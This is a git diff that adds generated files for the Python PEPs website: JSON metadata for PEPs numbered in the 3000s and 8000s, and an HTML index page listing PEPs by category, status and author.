Broytman, Jim J. Jewett", + "discussions_to": "python-3000@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "27-May-2008", + "python_version": null, + "post_history": "28-May-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3140/" + }, + "3141": { + "number": 3141, + "title": "A Type Hierarchy for Numbers", + "authors": "Jeffrey Yasskin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Apr-2007", + "python_version": "3.0", + "post_history": "25-Apr-2007, 16-May-2007, 02-Aug-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3141/" + }, + "3142": { + "number": 3142, + "title": "Add a \"while\" clause to generator expressions", + "authors": "Gerald Britton", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "12-Jan-2009", + "python_version": "3.0", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2013-May/126136.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3142/" + }, + "3143": { + "number": 3143, + "title": "Standard daemon process library", + "authors": "Ben Finney", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "26-Jan-2009", + "python_version": "3.x", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3143/" + }, + "3144": { + "number": 3144, + "title": "IP Address Manipulation Library for the Python Standard Library", + "authors": "Peter Moody", + "discussions_to": "ipaddr-py-dev@googlegroups.com", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "06-Feb-2012", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119474.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3144/" + }, + "3145": { + "number": 3145, + "title": "Asynchronous I/O For subprocess.Popen", + "authors": "Eric Pruitt, Charles R. McCreary, Josiah Carlson", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "04-Aug-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3145/" + }, + "3146": { + "number": 3146, + "title": "Merging Unladen Swallow into CPython", + "authors": "Collin Winter, Jeffrey Yasskin, Reid Kleckner", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "01-Jan-2010", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3146/" + }, + "3147": { + "number": 3147, + "title": "PYC Repository Directories", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Dec-2009", + "python_version": "3.2", + "post_history": "30-Jan-2010, 25-Feb-2010, 03-Mar-2010, 12-Apr-2010", + "resolution": "https://mail.python.org/pipermail/python-dev/2010-April/099414.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3147/" + }, + "3148": { + "number": 3148, + "title": "futures - execute computations asynchronously", + "authors": "Brian Quinlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Oct-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3148/" + }, + "3149": { + "number": 3149, + "title": "ABI version tagged .so files", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Jul-2010", + "python_version": "3.2", + "post_history": "14-Jul-2010, 22-Jul-2010", + "resolution": "https://mail.python.org/pipermail/python-dev/2010-September/103408.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3149/" + }, + "3150": { + "number": 3150, + "title": "Statement local namespaces (aka \"given\" clause)", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "09-Jul-2010", + "python_version": "3.4", + "post_history": "14-Jul-2010, 21-Apr-2011, 13-Jun-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3150/" + }, + "3151": { + "number": 3151, + "title": "Reworking the OS and IO exception hierarchy", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "21-Jul-2010", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2011-October/114033.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3151/" + }, + "3152": { + "number": 3152, + "title": "Cofunctions", + "authors": "Gregory Ewing", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "13-Feb-2009", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3152/" + }, + "3153": { + "number": 3153, + "title": "Asynchronous IO support", + "authors": "Laurens Van Houtven", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "29-May-2011", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "3156", + "url": "https://peps.python.org/pep-3153/" + }, + "3154": { + "number": 3154, + "title": "Pickle protocol version 4", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Aug-2011", + "python_version": "3.4", + "post_history": "`12-Aug-2011 `__", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130439.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3154/" + }, + "3155": { + "number": 3155, + "title": "Qualified name for classes and functions", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Oct-2011", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2011-November/114545.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3155/" + }, + "3156": { + "number": 3156, + "title": "Asynchronous IO Support Rebooted: the \"asyncio\" Module", + "authors": "Guido van Rossum", + "discussions_to": "python-tulip@googlegroups.com", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Dec-2012", + "python_version": "3.3", + "post_history": "21-Dec-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130419.html", + "requires": null, + "replaces": "3153", + "superseded_by": null, + "url": "https://peps.python.org/pep-3156/" + }, + "3333": { + "number": 3333, + "title": "Python Web Server Gateway Interface v1.0.1", + "authors": "Phillip J. Eby", + "discussions_to": "web-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "26-Sep-2010", + "python_version": null, + "post_history": "26-Sep-2010, 04-Oct-2010", + "resolution": null, + "requires": null, + "replaces": "333", + "superseded_by": null, + "url": "https://peps.python.org/pep-3333/" + }, + "8000": { + "number": 8000, + "title": "Python Language Governance Proposal Overview", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8000/" + }, + "8001": { + "number": 8001, + "title": "Python Governance Voting Process", + "authors": "Brett Cannon, Christian Heimes, Donald Stufft, Eric Snow, Gregory P. Smith, \u0141ukasz Langa, Mariatta, Nathaniel J. Smith, Pablo Galindo Salgado, Raymond Hettinger, Tal Einat, Tim Peters, Zachary Ware", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8001/" + }, + "8002": { + "number": 8002, + "title": "Open Source Governance Survey", + "authors": "Barry Warsaw, \u0141ukasz Langa, Antoine Pitrou, Doug Hellmann, Carol Willing", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8002/" + }, + "8010": { + "number": 8010, + "title": "The Technical Leader Governance Model", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8010/" + }, + "8011": { + "number": 8011, + "title": "Python Governance Model Lead by Trio of Pythonistas", + "authors": "Mariatta, Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8011/" + }, + "8012": { + "number": 8012, + "title": "The Community Governance Model", + "authors": "\u0141ukasz Langa", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "03-Oct-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8012/" + }, + "8013": { + "number": 8013, + "title": "The External Council Governance Model", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "14-Sep-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8013/" + }, + "8014": { + "number": 8014, + "title": "The Commons Governance Model", + "authors": "Jack Jansen", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "16-Sep-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8014/" + }, + "8015": { + "number": 8015, + "title": "Organization of the Python community", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "04-Oct-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8015/" + }, + "8016": { + "number": 8016, + "title": "The Steering Council Model", + "authors": "Nathaniel J. Smith, Donald Stufft", + "discussions_to": null, + "status": "Accepted", + "type": "Informational", + "topic": "governance", + "created": "01-Nov-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8016/" + }, + "8100": { + "number": 8100, + "title": "January 2019 Steering Council election", + "authors": "Nathaniel J. Smith, Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "03-Jan-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8100/" + }, + "8101": { + "number": 8101, + "title": "2020 Term Steering Council election", + "authors": "Ewa Jodlowska, Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "16-Nov-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8101/" + }, + "8102": { + "number": 8102, + "title": "2021 Term Steering Council election", + "authors": "Ewa Jodlowska, Ee Durbin, Joe Carey", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "29-Oct-2020", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8102/" + }, + "8103": { + "number": 8103, + "title": "2022 Term Steering Council election", + "authors": "Ewa Jodlowska, Ee Durbin, Joe Carey", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "04-Oct-2021", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8103/" + }, + "8104": { + "number": 8104, + "title": "2023 Term Steering Council election", + "authors": "Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "08-Nov-2022", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8104/" + }, + "8105": { + "number": 8105, + "title": "2024 Term Steering Council election", + "authors": "Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "23-Oct-2023", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8105/" + }, + "8106": { + "number": 8106, + "title": "2025 Term Steering Council election", + "authors": "Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "21-Oct-2024", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8106/" + }, + "0": { + "number": 0, + "title": "Index of Python Enhancement Proposals (PEPs)", + "authors": "The PEP Editors", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "13-Jul-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0000/" + } +} \ No newline at end of file diff --git a/contents/index.html b/contents/index.html new file mode 100644 index 00000000000..14d843378e6 --- /dev/null +++ b/contents/index.html @@ -0,0 +1,104 @@ + + + + + + + + Python Enhancement Proposals (PEPs) | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

Python Enhancement Proposals (PEPs)

+

This is an internal Sphinx page; please go to the PEP Index.

+
+
+
+ +
+ +
+ + + + + \ No newline at end of file diff --git a/index.html b/index.html new file mode 100644 index 00000000000..64fad71e205 --- /dev/null +++ b/index.html @@ -0,0 +1,5375 @@ + + + + + + + + PEP 0 – Index of Python Enhancement Proposals (PEPs) | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 0 – Index of Python Enhancement Proposals (PEPs)

+
+
Author:
+
The PEP Editors
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
13-Jul-2000
+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP contains the index of all Python Enhancement Proposals, +known as PEPs. PEP numbers are assigned +by the PEP editors, and once assigned are never changed. The +version control history of +the PEP texts represent their historical record.

+
+
+

Topics

+

PEPs for specialist subjects are indexed by topic.

+ +
+
+

API

+

The PEPS API is a JSON file of metadata about all the published PEPs. Read more here.

+
+
+

Numerical Index

+

The numerical index contains a table of all PEPs, ordered by number.

+
+
+

Index by Category

+
+

Process and Meta-PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
PA1PEP Purpose and GuidelinesBarry Warsaw, Jeremy Hylton, David Goodger, Alyssa Coghlan
PA2Procedure for Adding New ModulesBrett Cannon, Martijn Faassen
PA4Deprecation of Standard ModulesBrett Cannon, Martin von Löwis
PA7Style Guide for C CodeGuido van Rossum, Barry Warsaw
PA8Style Guide for Python CodeGuido van Rossum, Barry Warsaw, Alyssa Coghlan
PA10Voting GuidelinesBarry Warsaw
PA11CPython platform supportMartin von Löwis, Brett Cannon
PA12Sample reStructuredText PEP TemplateDavid Goodger, Barry Warsaw, Brett Cannon
PA13Python Language GovernanceThe Python core team and community
PA387Backwards Compatibility PolicyBenjamin Peterson
PA545Python Documentation TranslationsJulien Palard, Inada Naoki, Victor Stinner
PA602Annual Release Cycle for PythonŁukasz Langa3.9
PA609Python Packaging Authority (PyPA) GovernanceDustin Ingram, Pradyun Gedam, Sumana Harihareswara
PA676PEP Infrastructure ProcessAdam Turner
PA729Typing governance processJelle Zijlstra, Shantanu Jain
PA731C API Working Group CharterGuido van Rossum, Petr Viktorin, Victor Stinner, Steve Dower, Irit Katriel
PA732The Python Documentation Editorial BoardJoanna Jablonski
PA761Deprecating PGP signatures for CPython artifactsSeth Michael Larson3.14
+
+
+

Other Informational PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
IA20The Zen of PythonTim Peters
IA101Doing Python Releases 101Barry Warsaw, Guido van Rossum
IF247API for Cryptographic Hash FunctionsA.M. Kuchling
IF248Python Database API Specification v1.0Greg Stein, Marc-André Lemburg
IF249Python Database API Specification v2.0Marc-André Lemburg
IA257Docstring ConventionsDavid Goodger, Guido van Rossum
IF272API for Block Encryption Algorithms v1.0A.M. Kuchling
IA287reStructuredText Docstring FormatDavid Goodger
IA290Code Migration and ModernizationRaymond Hettinger
IF333Python Web Server Gateway Interface v1.0Phillip J. Eby
IA394The “python” Command on Unix-Like SystemsKerrick Staley, Alyssa Coghlan, Barry Warsaw, Petr Viktorin, Miro Hrončok, Carol Willing
IF399Pure Python/C Accelerator Module Compatibility RequirementsBrett Cannon3.3
IF430Migrating to Python 3 as the default online documentationAlyssa Coghlan
IA434IDLE Enhancement Exception for All BranchesTodd Rovito, Terry Reedy
IF452API for Cryptographic Hash Functions v2.0A.M. Kuchling, Christian Heimes
IF457Notation For Positional-Only ParametersLarry Hastings
IF482Literature Overview for Type HintsŁukasz Langa
IF483The Theory of Type HintsGuido van Rossum, Ivan Levkivskyi
IA514Python registration in the Windows registrySteve Dower
IF579Refactoring C functions and methodsJeroen Demeyer
IF588GitHub Issues Migration PlanMariatta
IA596Python 3.9 Release ScheduleŁukasz Langa3.9
IF607Reducing CPython’s Feature Delivery LatencyŁukasz Langa, Steve Dower, Alyssa Coghlan3.9
IA619Python 3.10 Release SchedulePablo Galindo Salgado3.10
IF630Isolating Extension ModulesPetr Viktorin
IF635Structural Pattern Matching: Motivation and RationaleTobias Kohn, Guido van Rossum3.10
IF636Structural Pattern Matching: TutorialDaniel F Moisset3.10
IF659Specializing Adaptive InterpreterMark Shannon
IA664Python 3.11 Release SchedulePablo Galindo Salgado3.11
IA672Unicode-related Security Considerations for PythonPetr Viktorin
IA693Python 3.12 Release ScheduleThomas Wouters3.12
IA719Python 3.13 Release ScheduleThomas Wouters3.13
IF733An Evaluation of Python’s Public C APIErlend Egeberg Aasland, Domenico Andreoli, Stefan Behnel, Carl Friedrich Bolz-Tereick, Simon Cross, Steve Dower, Tim Felgentreff, David Hewitt, Shantanu Jain, Wenzel Jakob, Irit Katriel, Marc-Andre Lemburg, Donghee Na, Karl Nelson, Ronald Oussoren, Antoine Pitrou, Neil Schemenauer, Mark Shannon, Stepan Sindelar, Gregory P. Smith, Eric Snow, Victor Stinner, Guido van Rossum, Petr Viktorin, Carol Willing, William Woodruff, David Woods, Jelle Zijlstra
IA745Python 3.14 Release ScheduleHugo van Kemenade3.14
IF762REPL-acing the default REPLPablo Galindo Salgado, Łukasz Langa, Lysandros Nikolaou, Emily Morehouse-Valcarcel3.13
IA801ReservedBarry Warsaw
IF3333Python Web Server Gateway Interface v1.0.1Phillip J. Eby
IF8000Python Language Governance Proposal OverviewBarry Warsaw
IF8002Open Source Governance SurveyBarry Warsaw, Łukasz Langa, Antoine Pitrou, Doug Hellmann, Carol Willing
IA8016The Steering Council ModelNathaniel J. Smith, Donald Stufft
IF8100January 2019 Steering Council electionNathaniel J. Smith, Ee Durbin
IF81012020 Term Steering Council electionEwa Jodlowska, Ee Durbin
IF81022021 Term Steering Council electionEwa Jodlowska, Ee Durbin, Joe Carey
IF81032022 Term Steering Council electionEwa Jodlowska, Ee Durbin, Joe Carey
IF81042023 Term Steering Council electionEe Durbin
IF81052024 Term Steering Council electionEe Durbin
IF81062025 Term Steering Council electionEe Durbin
+
+
+

Provisional PEPs (provisionally accepted; interface may still change)

+ + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
SP639Improving License Clarity with Better Package MetadataPhilippe Ombredanne, C.A.M. Gerlach, Karolina Surma
SP708Extending the Repository API to Mitigate Dependency Confusion AttacksDonald Stufft
+
+
+

Accepted PEPs (accepted; may not be implemented yet)

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
SA458Secure PyPI downloads with signed repository metadataTrishank Karthik Kuppusamy, Vladimir Diaz, Marina Moore, Lukas Puehringer, Joshua Lock, Lois Anne DeLong, Justin Cappos
SA563Postponed Evaluation of AnnotationsŁukasz Langa3.7
SA590Vectorcall: a fast calling protocol for CPythonMark Shannon, Jeroen Demeyer3.8
SA625Filename of a Source DistributionTzu-ping Chung, Paul Moore
SA649Deferred Evaluation Of Annotations Using DescriptorsLarry Hastings3.14
SA658Serve Distribution Metadata in the Simple Repository APITzu-ping Chung
SA668Marking Python base environments as “externally managed”Geoffrey Thomas, Matthias Klose, Filipe Laíns, Donald Stufft, Tzu-ping Chung, Stefano Rivera, Elana Hashman, Pradyun Gedam
SA685Comparison of extra names for optional distribution dependenciesBrett Cannon
SA686Make UTF-8 mode defaultInada Naoki3.15
SA687Isolating modules in the standard libraryErlend Egeberg Aasland, Petr Viktorin3.12
SA691JSON-based Simple API for Python Package IndexesDonald Stufft, Pradyun Gedam, Cooper Lees, Dustin Ingram
SA699Remove private dict version field added in PEP 509Ken Jin3.12
SA701Syntactic formalization of f-stringsPablo Galindo, Batuhan Taskaya, Lysandros Nikolaou, Marta Gómez Macías3.12
SA703Making the Global Interpreter Lock Optional in CPythonSam Gross3.13
SA714Rename dist-info-metadata in the Simple APIDonald Stufft
SA735Dependency Groups in pyproject.tomlStephen Rosen
SA753Uniform project URLs in core metadataWilliam Woodruff, Facundo Tuesca
+
+
+

Open PEPs (under consideration)

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
S467Minor API improvements for binary sequencesAlyssa Coghlan, Ethan Furman3.13
S480Surviving a Compromise of PyPI: End-to-end signing of packagesTrishank Karthik Kuppusamy, Vladimir Diaz, Justin Cappos, Marina Moore
S603Adding a frozenmap type to collectionsYury Selivanov
S638Syntactic MacrosMark Shannon
S653Precise Semantics for Pattern MatchingMark Shannon
S661Sentinel ValuesTal Einat
S671Syntax for late-bound function argument defaultsChris Angelico3.12
S679Allow parentheses in assert statementsPablo Galindo Salgado3.12
S694Upload 2.0 API for Python Package RepositoriesDonald Stufft
S710Recording the provenance of installed packagesFridolín Pokorný
S711PyBI: a standard format for distributing Python BinariesNathaniel J. Smith
S718Subscriptable functionsJames Hilton-Balfe3.13
I720Cross-compiling Python packagesFilipe Laíns3.12
S725Specifying external dependencies in pyproject.tomlPradyun Gedam, Ralf Gommers
S727Documentation in Annotated MetadataSebastián Ramírez3.13
S728TypedDict with Typed Extra ItemsZixuan James Li3.14
S736Shorthand syntax for keyword arguments at invocationJoshua Bambrick, Chris Angelico3.14
S739Static description file for build details of Python installationsFilipe Laíns3.14
S743Add Py_COMPAT_API_VERSION to the Python C APIVictor Stinner, Petr Viktorin3.14
I744JIT CompilationBrandt Bucher, Savannah Ostrowski3.13
S746Type checking Annotated metadataAdrian Garcia Badaracco3.14
S747Annotating Type FormsDavid Foster, Eric Traut3.14
S748A Unified TLS API for PythonJoop van de Pol, William Woodruff3.14
S749Implementing PEP 649Jelle Zijlstra3.14
S750Template StringsJim Baker, Guido van Rossum, Paul Everitt, Koudai Aono, Lysandros Nikolaou, Dave Peck3.14
S751A file format to record Python dependencies for installation reproducibilityBrett Cannon
S752Implicit namespaces for package repositoriesOfek Lev
P755Implicit namespace policy for PyPIOfek Lev
S758Allow except and except* expressions without parenthesesPablo Galindo, Brett Cannon3.14
S759External Wheel HostingBarry Warsaw, Ethan Smith
S763Limiting deletions on PyPIWilliam Woodruff, Alexis Challande
S765Disallow return/break/continue that exit a finally blockIrit Katriel, Alyssa Coghlan3.14
I766Explicit Priority Choices Among Multiple IndexesMichael Sarahan
S767Annotating Read-Only AttributesEneg3.14
S768Safe external debugger interface for CPythonPablo Galindo Salgado, Matt Wozniski, Ivona Stojanovic3.14
S777How to Re-invent the WheelEthan Smith
S789Preventing task-cancellation bugs by limiting yield in async generatorsZac Hatfield-Dodds, Nathaniel J. Smith3.14
P2026Calendar versioning for PythonHugo van Kemenade3.26
+
+
+

Finished PEPs (done, with a stable interface)

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
SF100Python Unicode IntegrationMarc-André Lemburg2.0
SF201Lockstep IterationBarry Warsaw2.0
SF202List ComprehensionsBarry Warsaw2.0
SF203Augmented AssignmentsThomas Wouters2.0
SF205Weak ReferencesFred L. Drake, Jr.2.1
SF207Rich ComparisonsGuido van Rossum, David Ascher2.1
SF208Reworking the Coercion ModelNeil Schemenauer, Marc-André Lemburg2.1
SF214Extended Print StatementBarry Warsaw2.0
SF217Display Hook for Interactive UseMoshe Zadka2.1
SF218Adding a Built-In Set Object TypeGreg Wilson, Raymond Hettinger2.2
